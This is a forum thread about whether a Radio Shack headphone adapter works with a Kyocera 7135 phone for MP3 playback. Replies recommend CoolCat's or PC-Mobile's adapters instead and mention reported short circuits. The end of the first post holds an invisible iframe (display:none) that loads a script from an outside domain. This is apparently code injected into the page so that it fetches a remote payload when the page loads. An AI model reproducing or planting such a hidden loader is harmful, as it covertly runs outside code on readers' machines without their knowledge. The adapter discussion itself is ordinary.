Radio Shack Audio Adapter

Does anyone know if the Radio Shack 1/8" to 3/32" (part number 2740373) audio adapter will allow me to use my stereo headphones to listen to MP3 music on my Kyocera 7135? If it does not, does anyone know where I can get an adapter? I found one from PC-Mobile, but it also includes a handsfree headset and costs $27, pricey for what I want. I also found Cool Cat's web page, but he is not taking any new orders for awhile. Thanks for any advice you can offer.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I think CoolCat is taking orders again this weekend (check his site). I ordered the PC-mobile one just 'cuz I needed something ASAP. I haven't received it yet, though.

I doubt the adapter you're talking about will work. You need to convert 3.5mm to 2.5mm, if I remember correctly.

I have never heard of anyone having any sort of success with a Radio Shack adaptor and the 7135. OTOH, I have read several reports of people having zero luck with RS adaptors and the 7135, with some even reporting a short circuiting situation. The only successful adaptors that I have read of are Coolcat's and PC-Mobile's.
